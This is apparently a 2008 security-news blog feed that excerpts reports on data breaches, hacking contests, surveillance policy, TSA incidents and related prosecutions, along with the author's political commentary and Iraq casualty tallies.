Verne Kopytoff writes in The San Francisco Chronicle:
When the nation's intelligence agencies wanted a computer network to better share information about everything from al Qaeda to North Korea, they turned to a big name in the technology industry to supply some of the equipment: Google Inc.
The Mountain View company sold the agencies servers for searching documents, marking a small victory for the company and its little-known effort to do business with the government.
"We are a very small group, and even a lot of people in the federal government don't know that we exist," said Mike Bradshaw, who leads Google's federal government sales team and its 18 employees.
The strategy is part of a broader plan at Google to expand beyond its consumer roots. Federal, state and local agencies, along with corporations and schools, are increasingly seen by the company as lucrative sources of extra revenue.
A hacker club has published what it says is the fingerprint of a Wolfgang Schauble, Germany's interior minister and a staunch supporter of the collection of citizen's unique physical characteristics as a means of preventing terrorism.
In the most recent issue of Die Datenschleuder, the Chaos Computer Club printed the image on a plastic foil that leaves fingerprints when it is pressed against biometric readers.
No-one from the Germany-based group has been able to test the foil to see if it can fool a computer into believing it came from Schauble. But the technique has been shown to work with a variety of other people's prints on almost two-dozen readers, according to a colleague of the hacker who pulled off the demonstration.
As of Saturday, March 29, 2008, at least 4,007 members of the U.S. military have died since the beginning of the Iraq war in March 2003, according to an Associated Press count. The figure includes eight military civilians. At least 3,261 died as a result of hostile action, according to the military's numbers.
The AP count is seven more than the Defense Department's tally, last updated Friday at 10 a.m. EDT.
A mysterious bomb-making experiment that ended with the accidental death of a government scientist has remained an official secret for more than five years, leaving his family in the dark about what went wrong.
Terry Jupp, a scientist with the Ministry of Defence, was engulfed in flames during a joint Anglo-American counter-terrorism project intended to discover more about al-Qaida's bomb-making capacities.
There has been no inquest into his death, as the coroner has been waiting for the MoD to disclose information about the incident. An attempt to prosecute the scientist's manager for manslaughter ended when prosecutors said they were withdrawing the charge, but said the case was too "sensitive" to explain that decision in open court.
More than 90 weapons and 230 laptop computers belonging to the Drug Enforcement Administration have turned up missing over the past five years and, despite efforts by the agency to address weaknesses in tracking the items, "significant deficiencies" remain, a report said yesterday.
The lost and stolen weapons include pistols, rifles, shotguns and a submachine gun, said a 105-page report by the Justice Department's Office of Inspector General, which also noted that DEA officials could not say how 198 of the 231 laptop computers came to be missing.
Inspector General Glenn A. Fine said the DEA was unable to provide assurance that 226 of the 231 lost or stolen laptop computers did not contain "sensitive or personally identifiable" information, adding that few of the missing laptops were protected by encryption software.
Disrupting business at Aspen booking agency Ski.com will cost a former employee $13,096, a federal judge has ruled.
James M. DiBlasio, convicted of two federal felonies connected to computer tampering, also must serve six months of house arrest and three years of probation as part of a sentence handed down March 14 by Judge Lewis T. Babcock.
The former Aspen resident also was ordered to undergo alcohol abuse treatment and mental health treatment. Additionally, DiBlasio can not open up new credit accounts or incur additional credit charges, according to documents filed in the U.S. District Court of Denver.
DiBlasio, now a resident of Indiana, was a sales representative for Ski.com from September 2004 through November 2006.
In October, a federal grand jury indicted him for deleting airline reservations, altering contact information between Ski.com and the airlines with which it books reservations, and deleting electronic data that Ski.com used to review available reservations. DiBlasio also changed the profile Ski.com sent to airlines. The indictment said DiBlasio committed the crimes in January 2007, from a computer in Indiana.
The crimes were committed when DiBlasio went on a “three-day drinking binge,” according to a sentencing memorandum written by his attorney, H. Michael Steinberg of Greenwood Village, Colo.
Late Night Rant: Culture of Fear - A War on Everyone, Everything, Everywhere
Since September 11, 2001, Americans -- and other nationalities -- have been bombarded with fear.
That's a plain fact. And there are a few other facts I'd like to highlight.
But don't misunderstand me -- 9/11 was a horrible, despicable act of terrorism that took the life of thousands of innocent victims.
The culture of fear that followed set into motion some very distasteful events, "strategies", and governmental policies that may prove to be equally as damaging in the long term, erode the rule of law, the right to reasonable privacy, due process under the law (Habeas Corpus), immorally (and quite possibly illegally) torturing and detention of individuals for unreasonable cause, and further besmirch the reputation of the United States for generations to come.
The news media and the faux, self-serving patriarchal Republican Bush administration cronies - and anyone else on this planet that would benefit from the masses cowering in the fear of a catastrophic terrorist attack - have made it their business to ensure that you are aware that the dangers are everywhere, and "...they're out to kill you, those dirty terrorist bastards".
Issues need to be seen as they are, not as they are presented.
This isn't going to be a full-tilt, vapid rant, but I did want to get a couple of issues off my chest.
So bear with me.
A lot of more eloquent writers (especially Chalmers Johnson) have written much more in-depth about the decay of "The American Situation" and associated issues, so I won't try to reinvent the wheel here. But I would like to mention a couple of salient points.
First, since 9/11, the (what I would consider to be) scared values set forth by our founding fathers in the U.S. Constitution -- the balances of the three branches of government, the Bill of Rights, et al -- have been rendered somewhat "dispensable" by a President that seems bent on destroying this country by ignoring the rule of law, and has promulgated a semi-fascist end-game.
For instance, I give you the FBI "Operations TIPS" program. Operation TIPS is the acronym for the "Terrorism Information and Prevention System" -- a system designed by President George W. Bush to have U.S. citizens report suspicious activity -- to report your friends and neighbors (or any person that looks suspicious, like brown people taking out the trash) as possible terrorists.
This concept is not new, of course.
"Bocca di Leone" - The Lion's Mouth
In 15th century Venice, Italy, the established rulers crafted a series of clever ways for the citizenry to rat out their friends and neighbors for all sorts of crimes, criminal, religious blasphemy, real or imagined.
The most ingenious were sculptured accoutrements built into the walls of government buildings, in the image of Lions [image above] or other figures, wherein the mouth was a slot into which "complaints" could be lodged against someone that "needed to be brought to the attention of the authorities."
Now, of course, you can certainly imagine how this could be abused by someone with a grudge, but the system fostered the prosecution, and persecution, on untold numbers of innocents.
Think: Witch hunt. Or religious purification. Or terrorism, for that matter.
"Culture of fear is a term that refers to a perceived prevalence of fear and anxiety in public discourse and relationships, and how this may affect the way people interact with one another as individuals and as democratic agents."
The U.S. Government, and specifically the Bush Administration, has masterfully employed these sorts of tactics to secretly manipulate the rule of law, bypassing the confines of the Constitutional limits of the executive branch, and empowering themselves in such a way as to further their goals -- the complete and utter freedom to pursue their goals and operate in an environment where they feel beyond reproach from congressional or judicial restraint.
This chain must be broken. The Constitutional balance of powers must be restored.
Why Do We Often Fear the Wrong Things?
Grant Jewell Rich wrote that the book "Culture of Fear", by Barry Glassner, was a "...wonderfully written new book, Barry Glassner reminds us again and again that frequently our fears are grossly exaggerated given the actual frequency of these rare events."
Indeed, as Rich points out, "...News media may use these fears to earn higher ratings, politicians may play on our fears during elections, and perhaps, in a sense, even lobbyists for special interest groups may exchange fear for increased fund-raising."
Bruce Schneier often writes about the "War on the Unexpected" -- here and here -- illustrating how this Culture of Fear is manifesting itself, and in very real and sociologically damaging ways.
And in the latest, and most outrageous to date, the Transportation Security Administration (TSA) continues to display randoms acts of stupidity, in a rather perverse manifestation of the Culture of Fear run amok.
Why is this important? Real, Unabridged, Truthful Security
Security in your person, security on the world stage, trickle-down security that benefits all of us, globally, instead of the damaging "devil-may-care" slash-and-burn policies of the current U.S. administration.
Without lies, or pretexts, or half-truths.
And maybe even a breath of life into an economy that has been deflated by multi-billion dollar spending on a war that never should have happened.
American leaders, politicians, patricians, and policemen must stop ramming their policies down the collective throats of the American people. Anyone who engages in this rhetoric is not a true leader -- they are a liability, a blow to true democracy, and a stain on the cloth of the American people, and the rest of the peace-loving people on Planet Earth.
It must stop, and it must stop now. We must break this cycle.
The policies employed since 9/11 is harming America, not helping.
As of Friday, March 28, 2008, at least 4,005 members of the U.S. military have died since the beginning of the Iraq war in March 2003, according to an Associated Press count. The figure includes eight military civilians. At least 3,261 died as a result of hostile action, according to the military's numbers.
The AP count is five more than the Defense Department's tally, last updated Friday at 10 a.m. EDT.
In a practice adopted at one college after another since the massacre at Virginia Tech, a University of Kentucky committee of deans, administrators, campus police and mental health officials has begun meeting regularly to discuss a watch list of troubled students and decide whether they need professional help or should be sent packing.
These "threat assessment groups" are aimed at heading off the kind of bloodshed seen at Virginia Tech a year ago and at Northern Illinois University last month.
The Kentucky panel, called Students of Concern, held its first meeting last week and will convene at least twice a month to talk about students whose strange or disturbing behavior has come to their attention.
The head of U.S. intelligence has established a new committee of senior officials to oversee technical measures needed to protect classified data and networks.
In a directive issued last month and posted on the Web by the Secrecy News blog this week, U.S. Director of National Intelligence Michael McConnell outlined steps to improve countermeasures against technical surveillance. Such measures, called TSCM, "are designed to detect and nullify a wide range of technologies used to gain unauthorized access to classified national security information," wrote McConnell.
The directive establishes the National Integrated Technical Surveillance Counter-Measures Committee, a body made up of senior officials from all 16 U.S. intelligence agencies and led by one of McConnell's deputies.
The agency that manages data from U.S. spy satellites is exploring ways to map the nation's entire electric grid as part of efforts to protect infrastructure.
The National Geospatial-Intelligence Agency wants to create an "electric energy infrastructure dataset," including the geographical locations of all transmission lines, power plants, substations, and generating units, to show the way power flows through the system and where the control points are, the agency said this week in procurement documents.
In a so-called sources sought notice, the NGA asks any companies that could provide such a database how accurate their geo-locational data is, what format they could provide the database in, and how often it would be updated.
The database is being established, the notice says, "in support of the federal level homeland security, homeland defense, and emergency response and recovery missions to protect the nation's infrastructure."
PCI compliance shouldn't—and, in my opinion, likely won't—provide this absolute legal protection being touted. The intent was always that if a retailer could establish that they insistently did everything they could have done—and should have done—properly in terms of data protection, that they would then have their liability severely limited. That makes sense.
But to project that on a once-a-year declaration of compliance from one assessor based on fragmentary examination of a single point-in-time—working with an imperfect list of interpretable guidelines—is little more than ludicrous.
An Arizona man filed a proposed class-action lawsuit against LifeLock, a Tempe-based company that claims to protect customers against identity theft.
The lawsuit alleges that the company has defrauded customers by offering services it can't legally perform, as well as by claiming a $1 million guarantee that, after reading the fine print, is limiting to the point of being useless.
LifeLock has gained notoriety with commercials that show CEO Tom Davis's Social Security number on the side of a truck, while Davis tells the audience that he is confident his company's services will protect him – and potential customers – from having their identity stolen.
The advertising is misleading and false, according Rob Carey, partner in the law firm Hagens Berman Sobol Shapiro.
The nonprofit Epilepsy Foundation, which runs the forum, briefly closed the site Sunday to purge the offending messages and to boost security.
"We are seeing people affected," says Ken Lowenberg, senior director of web and print publishing at the Epilepsy Foundation. "It's fortunately only a handful. It's possible that people are just not reporting yet -- people affected by it may not be coming back to the forum so fast."
The incident, possibly the first computer attack to inflict physical harm on the victims, began Saturday, March 22, when attackers used a script to post hundreds of messages embedded with flashing animated gifs.
A blossoming Web attack, first reported by security researcher Dancho Danchev earlier this month, has expanded to hit more than a million Web pages, including many well-known sites.
"The number and importance of the sites has increased," wrote Danchev in a Friday blog posting where he reported that trusted Web sites such as USAToday.com, Target.com, and Walmart.com have been hit with the attack.
The criminals behind this have not actually hacked into servers, but they are taking advantage of Web programming errors to inject malicious code into search results pages created by the Web sites' internal search engines.
Pellicano Trial: Slashed Tires, Ransacked Houses, and Nasty Hollywood Divorces
Allison Hope Weiner writes on The Huffington Post:
Wearing a beautifully tailored dark suit and red tie, actor Keith Carradine testified today about how he'd been wiretapped and harassed by Anthony Pellicano during his divorce from ex-wife, Sandra Carradine. Apparently, after Mr. Carradine split with his wife in 2000, bad things started happening to him. Not only did he find himself in the middle of a nasty, contentious divorce, his ex-wife also started dating Anthony Pellicano.
On top of that, Mr. Carradine testified that his then girlfriend (and now wife), Hayley Dumond, was "aggressively" followed by an unknown man, the tires of her car were slashed and her parents received numerous phone calls and hang-ups in the middle of the night. He got a call from a guy with a bad, fake accent, who offered to help him with his divorce.
Video surveillance is suddenly "the fastest-growing market for [digital] video chip providers."
The top executive at one such company, president and CEO Chris Day of Mobilygen (Santa Clara, Calif.), made that comment shortly after wrapping up a trip to China, where video surveillance applications are proliferating at an alarming rate.
Indeed, according to a China Security Market Report issued last year by the Security Industry Association (Alexandria, Va.), China's security and protection market, which includes fire and safety monitoring along with security surveillance and access control is projected to jump from $6.3 billion in 2005 to $18 billion in 2010.
That should come as no surprise to many in the U.S. financial community, which has been closely following the growth of companies that install and operate surveillance systems at banks, police stations, Internet cafes and other public places in China. The International Herald Tribune last year reported that American hedge funds have put more than $150 million into Chinese surveillance companies.
"TSA may support the 'thoroughness of the Officers involved' but the rest of the country thinks they are a bunch of power hungry goons with no sense of decency or common sense. That's even as airport security has gotten faster and a little less arbitrary over the last few years."
"I am continually amazed that officials at Homeland Security think they have any capital left to spend on defending this kind of stupidity."
- Ryan Singel, writing on Threat Level, regarding a statement by the U.S. Transportation Security Administration defending it's agents jack-booted thuggery when they forced a passenger to remove her nipple rings before boarding a flight in Lubbock, Texas.
Hackers Target Indonesian Government Over Online Porn Ban
An AFP newswire article, via NASDAQ.com, reports that:
Hackers took over an Indonesian government website for several hours to protest against a new law banning online pornography, the information ministry said Friday.
The protesters posted a message Thursday on the ministry of information website challenging it to "prove that the law was not drafted to cover the government's stupidity." Indonesia's parliament passed a law Tuesday against producing or accessing websites with pornographic or violent content.
"The message seemed to be directed at the law that was just passed by parliament," said ministry official Ferdinandus Setu, adding the site was taken down for a period but was now back to normal.
The new law, which has still to be approved by the president, provides for a maximum penalty of six years in jail or a fine of up to IDR1 billion ($110,000) for disseminating pornographic material online.
The ministry said it would start distributing software Saturday to allow Internet users to block pornographic sites.
Earlier this month, Security Fix took a look at Dmitry Ivanovich Golubov, a Ukrainian politician once considered by U.S. law enforcement to be a top cybercrime boss.
Golubov took rather strong exception to the way he was characterized in that post, denying involvement in any type of cybercrime activity. The problem, Golubov claimed, is that the FBI confused him with someone else.
According to Golubov, he was the victim of identity theft. Someone gained access to his passport, scanned it and posted it online along with a note confessing his involvement in a multinational credit card theft ring.
[Former FBI Agent E.J. Hilbert, who worked closely on the Golubov investigation] ...Hilbert says he's speechless at the vehement denials.
A massive data breach at Hannaford Brothers Cos. was caused by a "new and sophisticated" method in which software was secretly installed on servers at every one of its grocery stores, the company told Massachusetts regulators this week. more stories like this
The unauthorized intrusion the company disclosed on March 17 stemmed from software that intercepted card data from customers as they paid with plastic at store checkout counters, and sent the data overseas, Hannaford's top lawyer said in a letter sent to Attorney General Martha Coakley and Governor Deval Patrick's Office of Consumer Affairs and Business Regulation.
The software was installed on computer servers at each of the roughly 300 stores operated by Hannaford and its partners. Hannaford did not say how the software might have been placed on so many servers, and company spokeswoman Carol Eleazer said the company continues to investigate how the software was installed and other specifics of the breach. The Secret Service, which pursues currency crimes, is conducting its own investigation.
Data security specialists say the new details show how hackers have grown more adept at penetrating weak links in the systems that connect merchants and banks.
A Texas woman who claims she was forced to remove a nipple ring with pliers in order to board an airplane called Thursday for an apology by federal security agents and a civil rights investigation.
"I wouldn't wish this experience upon anyone," Mandi Hamlin, 37, said at a news conference in Los Angeles. "My experience with TSA was a nightmare I had to endure. No one deserves to be treated this way."
Hamlin said she was trying to board a flight from Lubbock to Dallas on Feb. 24 when she was scanned by a Transportation Security Administration agent after passing through a larger metal detector without problems.
The female TSA agent used a handheld detector that beeped when it passed in front of Hamlin's chest, the Dallas-area resident said.
Hamlin said she told the woman that she was wearing nipple piercings. The female agent then called over her male colleagues, one of whom said she would have to remove the body piercings, Hamlin claimed.
Hamlin said she could not remove them and asked if she could instead display her pierced breasts in private to the female agent. But several other male officers told her she could not board her flight until the jewelry was removed, she said.
She was taken behind a curtain and managed to remove one bar-shaped nipple piercing but had trouble with the second, a ring.
"Still crying, she informed the TSA officer that she could not remove it without the help of pliers, and the officer gave a pair to her," said Hamlin's attorney, Gloria Allred, reading from a letter she sent Thursday to the director of the TSA's Office of Civil Rights and Liberties. Allred is a well-known Los Angeles lawyer who often represents high-profile claims.
Hamlin showed reporters at the news conference how she took off the second ring by applying pliers to the torso of a mannequin that had a peach-colored bra with the rings on it.
She said she heard male TSA agents snickering as she took out the ring. She was scanned again and was allowed to board even though she still was wearing a belly button ring.
Note: This is simply inexcusable. The ability for the TSA to continue to humiliate and defile American (or any other nationality for that matter) travelers is completely despicable. These practices must be stopped, and the offenders severely punished to the ultimate extent of the applicable laws. We demand it. -ferg
Companies Avoid Financial Penalties After Massive Computer Data Breaches
An AP newswire article by Dan Caterinicchia, via The Washington Post, reports that:
More than a year after millions of T.J. Maxx and Marshalls customers found out their credit card information had been hacked into, the discount stores' operator agreed to have its information audited but avoided paying federal fines.
TJX was one of three firms that agreed to settle charges that it "failed to provide reasonable and appropriate security for sensitive consumer information," federal regulators said yesterday in two unrelated data-breach decisions.
Data broker Reed Elsevier and its Seisint subsidiary also avoided fines but have agreed to obtain third-party audits biennially for 20 years under a separate settlement with the Federal Trade Commission.
The agreements, which will be finalized after a 30-day public comment period, also require the companies to implement comprehensive information security programs.
A computer hacker from Washington state was sentenced to three years in prison for placing a phony 911 call that led a SWAT team to storm a family home at gunpoint.
It marked the first prosecution in Orange County for a prank known as "swatting" that involves sending SWAT teams on wild goose chases, county district attorney's spokeswoman Farrah Emami said Thursday.
Randal T. Ellis, 19, pleaded guilty Wednesday in Orange County Superior Court to five felony counts, including computer access and fraud, false imprisonment by violence and falsely reporting a crime.
He was given prison time and ordered to pay $14,765 in restitution, most of which will go to the county Sheriff's Department.
Verne Kopytoff writes on The San Francisco Chronicle's "The Tech Chronicles" Blog:
Connecticut Attorney General Richard Blumenthal today threatened legal action against Craigslist if it does not curb prostitutes from advertising their services on its Web site.
In a letter to Craigslist today, he took the San Francisco Web site to task for failing to have someone on staff to review postings by prostitutes, many of which use a section for "erotic services." Although Craigslist, a largely free online classified service, touts measures to ban illegal activities and to remove inappropriate postings, its actions are inadequate, he concluded.
A former technician who worked for Hart InterCivic -- a voting machine company based in Texas -- has alleged that his company lied to election officials about the accuracy, testing, reliability and security of its voting machines. The whistleblower says the company did so because it was eager to obtain some of the approximately $4 billion in federal funds that Congress allocated to states in 2002 to purchase new voting equipment under the Help America Vote Act (aka HAVA).
The technician, William Singer, filed a qui tam lawsuit on the federal government's behalf last year but the lawsuit remained sealed until today, according to the Associated Press, when the U.S. Attorney's office decided it would not join Singer in the litigation. Singer maintains that Hart was paid federal money under false pretenses for the eSlate machines it sold to states. He's now pursuing the case without the government and, according to a voicemail message that one of his lawyers left me, he's now doing so in conjunction with Robert Kennedy, Jr. If Singer wins and Hart InterCivic is forced to return funds to the federal government, Singer stands to obtain a percentage of those funds as a party to the suit.
Some users of the Sony PlayStation network may have had their passwords changed and personal information exposed through unauthorized access, the gaming platform provider has disclosed.
The restricted access may have occurred through a vulnerability in the PlayStation Store, a content download service of the PlayStation Network, according to a company statement on Wednesday. Changing the passwords makes it “possible to view users' personal information and/or use the Wallet for the PlayStation Store.”
The company said it was unlikely that credit card numbers were compromised.
PlayStation said the bug has been patched and the company is contacting users whose information may have been accessed. If a user's regular password works, that information was not affected, the statement said.
American citizens won't need a passport to cross the land borders until the middle of next year, delaying that requirement by more than a year.
New identification document requirements, the Department of Homeland Security and Department of State announced Thursday, will take effect June 1, 2009. By that date, travelers will need to present documents that show both identification and U.S. citizenship to cross back from Mexico and Canada. For most travelers, that will mean a passport.
The policy shift is the final step of the Western Hemisphere Travel Initiative (WHTI), which changes document requirements for travelers who were previously exempt — including citizens of the U.S., Canada and Bermuda.
The wire tapping of servers has led to the arrests of several individuals associated with a New Jersey-based gambling ring, reports online gambling website Gambling911.com.
Investigators can easily monitor every online bet made by agents just as they would with phone taps, a source told Gambling911.
There are currently several ongoing investigations into similar groups that offer these online bets, where stateside credit bookies use offshore wire rooms to facilitate the businesses, and a website is often provided to make it easier for participants to place bets.
New Jersey authorities arrested 42 people this week in connection with a gambling and drug ring allegedly run by the notorious New York City-based Genovese crime family, reports Gambling911. Some of the arrested individuals worked as adminstrators for the New Jersey public school system.
Remember how e-voting firm ES&S was so against letting California's Secretary of State have an independent security team review their e-voting machines? Well, now we know why. The state had already released one damning security report and sued ES&S for giving the state uncertified machines. Now the state has come out with another report on more ES&S machines and the story gets worse and worse and worse.
The good news is that California won't certify any of them. The bad news is that ES&S appears to not only be belligerent in not wanting to let California review its machines, but it also seems to be incompetent as well.
It may be the quickest $10,000 Charlie Miller ever earned.
He took the first of three laptop computers -- and a $10,000 cash prize -- Thursday after breaking into a MacBook Air at the CanSecWest security conference's PWN 2 OWN hacking contest.
Show organizers offered a Sony Vaio, Fujitsu U810, and the MacBook as prizes, saying that they could be won by anybody at the show who could find a way to hack into each of them and read the contents of a file on the system using a previously undisclosed "0day" attack.
Nobody was able to hack into the systems on the first day of the contest when contestants were only allowed to attack the computers over the network, but on Thursday, the rules were relaxed so that attackers could direct contest organizers using the computers to do things like visit Web sites or open e-mail messages.
Miller, best known as one of the researchers who first hacked Apple's iPhone last year, didn't take much time. Within 2 minutes, he directed the contest's organizers to visit a Web site that contained his exploit code, which then allowed him to seize control of the computer, as about 20 onlookers cheered him on.
Two months after Adobe Systems patched a serious flaw in its Flash development software, there are still hundreds of thousands of Web pages serving up buggy Shockwave Flash (.swf) files that could be exploited by hackers, according to a Google researcher.
Google security engineer Rich Cannings discovered the widespread vulnerability in his spare time while researching a book on Web security. It turned out that many Flash development tools created files that could be used by hackers in what's known as a cross-site scripting attack. This attack can be used in phishing, but it also gives the bad guys a nearly undetectable route into a victim's bank account or almost any type of Web service.
Cannings estimates that more than 10,000 Web sites are still affected by the issue.
Cannings first noticed the bug on Google's Web site and tracked down the Google employee responsible for the flaw: a sales representative who had been using Dreamweaver to create buggy Flash files.
Researchers at Finjan Software have discovered a one-stop online marketplace for buying stolen credit card and other sensitive information that offers volume discounts as well as customer service perks like "product" guarantees, according to a published report.
The so-called SellCVV2 Website, apparently named after the Card Verification Value 2 number on the backs of many major credit cards, appears to be using Google’s Blogspot service, according to Finjan. The big difference between SellCVV2 and other card-swapping sites "is the level of commercialization of the traders involved," Yuval Ben-Itzhak, CTO of Finjan, said in the report.
The FBI has gone through nearly all of its $500 million budget for making old telephone switches wiretap friendly, but an FBI survey showed that nearly 40 percent of the nation's switches still aren't up to federal wiretapping standards, according to a new report from the Justice Department's inspector general.
According to a redacted report [.pdf] from the DOJ's Inspector General, the FBI has only a little more than $5000 left in dedicated CALEA funds, which mostly went towards paying switch manufacturers to write wiretapping software and issue licenses to use that software for older switches.
The audit says it is not possible to tell if the money was well-spent, since neither the telecoms nor the switch makers are keen on sharing information.
The Federal Trade Commission (FTC) on Thursday announced a settlement with TJX over the discount retailer's massive breach of customer credit card records.
Last year, Framingham, Mass.-based TJX, which operates more than 2,500 stores worldwide, revealed that hackers stole some 45.7 million records from its systems over a two-year period period. Court filings since the disclosure have placed the amount at twice that number.
Based on its charges, the FTC painted a bleak information security picture of TJX, the parent company for Marshalls and T.J. Maxx outlets.
The FTC, in a statement Thursday, said TJX lacked proper security solutions, such as firewalls and wireless defense, and failed to patch vulnerabilities and update anti-virus signatures. The company also transmitted personal information in clear text, failed to require strong passwords and lacked measures to detect and prevent unauthorized computer access, the FTC also stated.
A hacker picking apart the security model of Microsoft's brand new Windows Server 2008 has found serious design weaknesses that render some of the product's new security protections "useless."
Cesar Cerrudo, founder and CEO of Argeniss Information Security, in Parana, Argentina, says the weaknesses could lead to privilege escalation attacks opens the door for a skilled hacker to take complete control of the operating system.
The opening of Heathrow's £4.3bn Terminal 5 this morning has been marred by problems with two major IT systems.
The introduction of fingerprinting was brought to a halt just hours before the new state-of-the-art terminal opened, following data protection concerns raised by the Information Commissioner’s Office.
The ICO has begun an investigation into data protection and the new fingerprinting system, focusing on passengers transferring on to domestic flights at T5.
Not long after BAA announced it would not fingerprint passengers, a sophisticated IT system aimed at cutting baggage handling times broke down. According to reports, arriving passengers were left stranded for up to two and a half hours, while “technical” problems were resolved to enable BAA to return their luggage.
The BBC has contacted the police after files containing personal details about all staff going to the Beijing Olympics this summer were stolen.
Details including passport numbers of 437 staff, from presenters to translators, were stored in the files in a private room at BBC Television Centre in west London. It is understood they went missing around March 14.
Those affected have been contacted and BBC director of sport Roger Mosey has sent out an email to other staff asking for their help in retrieving the files.
Sources said the BBC has been advised there is a low risk of identity fraud.
Aside from the passport information, the files also contain home addresses, pictures and details of which hotels BBC staff will be staying in.
A former San Jose City Council intern will perform 50 hours of community service after pleading guilty to a reduced charge of hacking into a city e-mail system last fall.
Eric Hernandez, 18, pleaded guilty Wednesday after Superior Court Judge Jerome Nadler granted a defense motion to reduce the charge from a felony to a misdemeanor. Nadler said he granted the motion based on the young man's lack of a prior criminal record and the circumstances of the offense.
Hernandez, who had interned for Councilman Sam Liccardo last summer, admitted to police earlier this year that he made unauthorized use of a password to troll through city e-mail accounts from his home computer, looking for political dirt to spread about his former boss's girlfriend. Police reported that Hernandez broke into the account of city staffer Jessica Garcia-Kohl more than 100 times.
As of Wednesday, March 26, 2008, at least 4,003 members of the U.S. military have died since the beginning of the Iraq war in March 2003, according to an Associated Press count. The figure includes eight military civilians. At least 3,257 died as a result of hostile action, according to the military's numbers.
The AP count is seven more than the Defense Department's tally, last updated Wednesday at 10 a.m. EDT.
As of Wednesday, March 26, 2008, at least 422 members of the U.S. military had died in Afghanistan, Pakistan and Uzbekistan as a result of the U.S. invasion of Afghanistan in late 2001, according to the Defense Department. The department last updated its figures March 22 at 10 a.m. EDT.
Of those, the military reports 289 were killed by hostile action.
File Sharers Get Help Spotting ISP 'Throttling' Moves
An AP newswire article by Peter Svennson, via The Houston Chronicle, reports that:
Vuze Inc., a California-based company that provides a popular file-sharing program, is giving its users a tool to help figure out if their Internet service provider is interfering with their traffic.
The Associated Press last year confirmed user reports that Comcast Corp., the country's largest cable company, was secretly disrupting some file-sharing by its subscribers. The company has acknowledged to the practice and said it's necessary to curb traffic that would otherwise slow down Internet speeds for other subscribers.
The "plug-in" Vuze made available as a free download last weekend looks for "reset packets," the tool Comcast uses to break off some connections with computers trying to download files from Comcast subscribers, Vuze said Wednesday.
The plug-in works with Vuze's main application, Azureus, which is based on the BitTorrent file-sharing technology. If the user allows it, the plug-in will send data back to Vuze, which will collect information about ISPs that are interfering with their subscribers' traffic.
Palo Alto-based Vuze said Azureus has been downloaded 20 million times, and an average of 1.3 million users are using at any one time.
With U.S. civil and military officials increasingly concerned about cyber attacks against American networks, the U.S. Air Force is planning to establish what will probably be the largest and most comprehensive military organization to defend against cyber attack.
And, unlike the apparent efforts of the other U.S. military services in this field, the Air Force will conduct offensive cyber warfare.
Bob Barr: Every Bank Transaction Triggers Snooping
Bob Barr writes in The Atlanta Journal-Constitution:
I am not an Eliot Spitzer fan. The now-former New York governor and I have disagreed privately and publicly on any number of issues, mostly involving questions of prosecutorial abuse. Still, I have great concern with the manner in which his fall from grace was orchestrated, and with the federal laws and regulations on which it was based. The sad saga of Spitzer should concern every American, or at least all those who maintain accounts at any financial institution or who engage in any form of electronic financial transactions.
The web of snooping in which federal investigators and regulators are now able to ensnare any person who engages in any form of financial transaction has become so complex and pervasive that almost no person anywhere in the world can escape its clutches. The ability of the government to manipulate this vast power is magnified manyfold by virtue of the manner in which our laws and regulations require the active complicity of the entire cadre of persons working in, or in some manner connected with, banks and other entities that provide or facilitate financial transactions.
Well, I know what isn't, and the major American outlets for "news" is not really news. It's drivel.
Here's a snapshot.
The BBC, which I consider to actually be "real news" site:
Click for larger image.
MSNBC, which I consider to be "Faux News" -- they don't really seem to care about covering real, hard-hitting issues (nor do any of the the other main U.S. news outlets):
Click for larger image.
Let's see... Okay, here's CNN.com:
Click for larger image.
Here's CBS News:
Click for larger image.
And ABC News is so polluted with third-party content, dangerous security holes, etc., that I won't even include it here -- but it is relatively the same content, devoid of real news.
You are being actively poisoned.
Let's examine the pressing front-page stories for each of these web news portals:
BBC News: Unrest spreads around Shia Iraq MSNBC News: Is affirmative action passé? CNN News: Arkansas flood damage at $2 million and rising CBS News: Cops Piece Together Iowa Family Slayings ABC News: McCain Addresses Housing Crisis Options
Now, I don't mean to lessen the importance of slayings in in Iowa, nor flooding in Arkansas -- both of which are quite serious -- but this snapshot of news shows that American news outlets cater to issues that somehow shield more serious, critical global issues from the American readership.
The problems in Iraq are absolutely more critical than the American people know, and if we don't collectively wise-up, we're going to be in for a rude awakening.
America: Wake up.
p.s. PBS is the only organization in the U.S. that has any guts to report the truth to the American people.
Pellicano Trial: Spurned Lovers, Prostitutes, and Cyber Geeks
Allison Hope Weiner writes on The Huffington Post:
Robert Pfeiffer, a former music executive, testified today that he hired Mr. Pellicano to destroy the life of his ex-girlfriend, Erin Finn. Mr. Pfeiffer told the jury that after he brought a lawsuit against a former employer for wrongful termination, his ex-girlfriend testified against him and on behalf of his ex-employer, saying he'd used drugs while employed.
Telling the jury that he became irrational and obsessive about Ms. Finn and her "betrayal," Mr. Pfeiffer said that he hired Mr. Pellicano to not only get Ms. Finn to recant her testimony about his drug use but to also "discredit her."
Mr. Pfeiffer claimed that Mr. Pellicano not only convinced him to a new lawyer, Alan Weil (who is also coincidentally on the government's witness list), but also got him to file several lawsuits against Ms. Finn, to harass her and to agree to wiretapping her phones. Although Mr. Pfeiffer said that Mr. Pellicano initially referred to his wiretapping of Ms. Finn's phone by code (as in "I've just read something"), Mr. Pellicano ultimately told him directly about the wiretapping and eventually invited him back to his office for a listen.
CNN: U.S. Air Marshalls On Only 1% of U.S. Flights
Drew Griffin, Kathleen Johnston and Todd Schwarzschild write on CNN.com:
Of the 28,000 commercial airline flights that take to the skies on an average day in the United States, fewer than 1 percent are protected by on-board, armed federal air marshals, a nationwide CNN investigation has found.
That means a terrorist or other criminal bent on taking over an aircraft would be confronted by a trained air marshal on as few as 280 daily flights, according to more than a dozen federal air marshals and pilots interviewed by CNN.
The Transportation Security Administration flatly denied those reports.
But marshals across the country -- all of whom spoke with CNN on the condition they not be identified for fear of losing their jobs -- said the 5 percent figure quoted to them by their TSA bosses is not possible.
One marshal said that while security is certainly one reason the numbers are kept secret, he believes the agency simply doesn't want taxpayers to know the truth.
"I would be very embarrassed by [the numbers] if they were to get out," one air marshal said.
In recent months we have seen occasions where Advertisements placed with Google have actually pointed consumers to sites which would attempt to infect their computers with various forms of malware. A new Phishing Campaign discovered in the UAB [University of Alabama at Birmingham] Spam Data Mine may indicate this form of attack is about to get a lot worse.
Google has been very quick to identify and terminate the accounts of these malware advertisers, but what will their response be when long-time "known good" advertisers suddenly start having malware pop up in their ads?
This seems to be the focus of a new phishing campaign.
SCADA Watch: Nuclear Plant Cyber Security Has A Ways To Go
Joe Weiss writes on the GlobalControl.com "Unfettered" Blog:
